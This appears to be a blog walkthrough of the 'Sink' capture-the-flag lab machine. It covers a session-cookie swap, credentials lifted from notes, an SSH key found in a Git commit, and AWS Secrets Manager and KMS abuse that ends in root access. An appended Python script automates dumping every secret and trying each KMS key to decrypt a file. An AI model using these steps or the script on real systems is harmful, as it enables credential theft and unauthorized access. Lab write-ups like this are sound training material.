In this post, I would like to share a walkthrough of the Sink machine.
This machine is rated Insane.
Information Gathering on Sink Machine
Once the VPN connection is up, we start gathering information on the machine by running nmap -sC -sV <IP Address>
The nmap result can be seen above, and two open ports caught my attention:
- 3000 – Gitea
- 5000 – Devops
The screenshot above shows the login page on port 5000.
The screenshot above shows the login page on port 3000.
On port 3000 (Gitea) the login page offers no way to register, so we cannot create an account of our own there.
Gaining Access to Sink Machine
Looking back at the sink.htb:5000 web interface, I notice that we can register ourselves.
After some research on the internet, I found a website that explains the exploit over here.
The idea is to swap our own session cookie for the admin's cookie.
- Reminder: the Cwo= cookie value shown above is a base64-encoded string; in Burp Suite, select it and press Ctrl+Shift+B to base64-decode it.
Each of the admin's note IDs holds a set of credentials:
Note1:
Chef Login : http://chef.sink.htb
Username : chefadm
Password : /6'fEGC&zEx{4]zz
Note2:
Dev Node URL : http://code.sink.htb
Username : root
Password : FaH@3L>Z3})zzfQ3
Note3:
Nagios URL : https://nagios.sink.htb
Username : nagios_adm
Password : g8<H6GK\{*L.fB3C
One of the credentials above also works for the Gitea instance on sink.htb:3000.
We log in to the Gitea dashboard.
Since a user named root exists, let's look at root's repositories.
A bunch of files are stored here, and one of them can be useful to us. The repository has 9 commits, and the one titled "Adding EC2 Key Management Structure" is the one to look at.
Maintaining Access
What a surprise! An SSH private key has been saved in that commit. Let's copy the entire key into a new id_rsa file on the attacker's machine and restrict the file to owner-only permissions (mode 600), or ssh will refuse to use it.
Let's ssh into the machine as Marcus using that key file.
In /home, I notice three users.
To read the user flag, go to /home/marcus and run cat user.txt.
Escalate to Root Privileges Access on the Machine
Let's see which ports are in use on the machine itself. Looking at the result, I notice that port 4566 is listening locally, which makes me curious.
Let's forward that port to our machine over SSH, as shown above.
We also find some interesting files in Marcus' Git profile.
Playing with AWS configuration on Sink Machine
We managed to get the AWS access key and secret key from those files.
Investigating Secrets Manager, we find a secret whose stored value is an encoded string we cannot read directly.
Let's retrieve the secret's value with the command below:
aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-HRbzR"
The returned password lets us switch user from Marcus to David.
Inside /home/david/ there is a folder, Projects/Prod_Deployment, that might hold something useful.
There's a file named servers.enc; let's open it with cat servers.enc.
Oh no! It's unreadable because the file is encrypted.
Let's list the available KMS keys with aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys, then decrypt the file with the right key; the Plaintext that KMS returns is base64-encoded.
We can decode it with CyberChef and obtain a username and password.
The credentials that we gained are shown below:
User: admin Password: _uezduQ!EY5AHfe2
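The two LocalStack steps above (pulling a secret's value from Secrets Manager, then finding the KMS key that decrypts servers.enc and base64-decoding the result) can be scripted so that every listed key and every algorithm it advertises is tried automatically. This is an added example, not code from the write-up: it assumes port 4566 is forwarded to 127.0.0.1:4566 as above, shells out to the same aws CLI the write-up uses, and ships with a constructed fake in place of the CLI so it runs offline; the key IDs, ARN and secret contents in that fake are made up. It also goes slightly beyond the write-up by inflating the decoded bytes if they happen to be gzip-compressed.

```python
"""Loot a LocalStack-style AWS endpoint: dump every Secrets Manager secret and
decrypt a KMS-encrypted file by trying each listed key with each algorithm it
advertises. Added example for this write-up; not the author's code."""
import base64
import gzip
import json
import subprocess

# Assumption: port 4566 has been forwarded to localhost, as in the write-up.
ENDPOINT = "http://127.0.0.1:4566/"


def aws_cli(*args):
    """Run the aws CLI against ENDPOINT and return its parsed JSON output.
    Raises RuntimeError on a non-zero exit so callers can treat a failure as
    'wrong key / wrong algorithm' and move on."""
    cmd = ["aws", "--endpoint-url", ENDPOINT, "--output", "json", *args]
    proc = subprocess.run(cmd, capture_output=True, text=True)
    if proc.returncode != 0:
        raise RuntimeError(proc.stderr.strip())
    return json.loads(proc.stdout) if proc.stdout.strip() else {}


def dump_secrets(run=aws_cli):
    """Return {secret name: value} for every secret the endpoint lists."""
    found = {}
    for entry in run("secretsmanager", "list-secrets").get("SecretList", []):
        value = run("secretsmanager", "get-secret-value", "--secret-id", entry["ARN"])
        if "SecretString" in value:
            found[entry["Name"]] = value["SecretString"]
        else:  # binary secrets come back base64-encoded
            found[entry["Name"]] = base64.b64decode(value["SecretBinary"]).decode(errors="replace")
    return found


def candidate_algorithms(key_metadata):
    """Asymmetric keys advertise EncryptionAlgorithms; symmetric keys use SYMMETRIC_DEFAULT."""
    return key_metadata.get("EncryptionAlgorithms") or ["SYMMETRIC_DEFAULT"]


def unwrap(plaintext_b64):
    """KMS returns Plaintext base64-encoded; if the bytes are gzip, inflate them too."""
    raw = base64.b64decode(plaintext_b64)
    if raw[:2] == b"\x1f\x8b":
        raw = gzip.decompress(raw)
    return raw


def recover_plaintext(ciphertext_path, run=aws_cli):
    """Return (key_id, algorithm, plaintext) for the first key that decrypts the
    file, or None if no listed key works."""
    for entry in run("kms", "list-keys").get("Keys", []):
        key_id = entry["KeyId"]
        meta = run("kms", "describe-key", "--key-id", key_id).get("KeyMetadata", {})
        if meta.get("KeyState", "Enabled") != "Enabled":
            continue  # disabled or pending-deletion keys cannot decrypt
        for algo in candidate_algorithms(meta):
            try:
                out = run("kms", "decrypt",
                          "--ciphertext-blob", f"fileb://{ciphertext_path}",
                          "--key-id", key_id,
                          "--encryption-algorithm", algo)
            except RuntimeError:
                continue  # wrong key or wrong algorithm; try the next one
            return key_id, algo, unwrap(out["Plaintext"])
    return None


# Constructed stand-in for the aws CLI so the example runs offline. Key IDs,
# ARNs and secret contents are made up and are not the machine's real values.
_PLAINTEXT = b"admin: example-password\n"
_ARN = "arn:aws:secretsmanager:us-east-1:000000000000:secret:demo-AbCdEf"
FAKE_RESPONSES = {
    ("secretsmanager", "list-secrets"): {"SecretList": [{"ARN": _ARN, "Name": "demo"}]},
    ("secretsmanager", "get-secret-value", "--secret-id", _ARN): {"SecretString": "david:example-secret"},
    ("kms", "list-keys"): {"Keys": [{"KeyId": "key-sym"}, {"KeyId": "key-rsa"}]},
    ("kms", "describe-key", "--key-id", "key-sym"): {
        "KeyMetadata": {"KeyId": "key-sym", "KeyState": "Disabled"}},
    ("kms", "describe-key", "--key-id", "key-rsa"): {
        "KeyMetadata": {"KeyId": "key-rsa", "KeyState": "Enabled",
                        "EncryptionAlgorithms": ["RSAES_OAEP_SHA_1", "RSAES_OAEP_SHA_256"]}},
}


def fake_run(*args):
    """Only key-rsa with RSAES_OAEP_SHA_256 decrypts; everything else errors like the CLI."""
    if args[:2] == ("kms", "decrypt"):
        if "key-rsa" in args and args[-1] == "RSAES_OAEP_SHA_256":
            return {"Plaintext": base64.b64encode(gzip.compress(_PLAINTEXT)).decode()}
        raise RuntimeError("An error occurred (InvalidCiphertextException)")
    return FAKE_RESPONSES[args]


if __name__ == "__main__":
    print(dump_secrets(run=fake_run))
    print(recover_plaintext("servers.enc", run=fake_run))
```

Against the real forwarded endpoint, call dump_secrets() and recover_plaintext("servers.enc") without the run argument. An asymmetric key only decrypts when --encryption-algorithm matches what was used at encryption time, which is why the loop tries each algorithm the key advertises instead of relying on the CLI default of SYMMETRIC_DEFAULT.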
Let's switch to root with those credentials, and it works like a charm!
To read the root flag, we go to /root/, where the root flag is normally stored.
-THE END-
Happy Learning Guys!
The screenshot above shows where I got the password hashes used to unlock this write-up.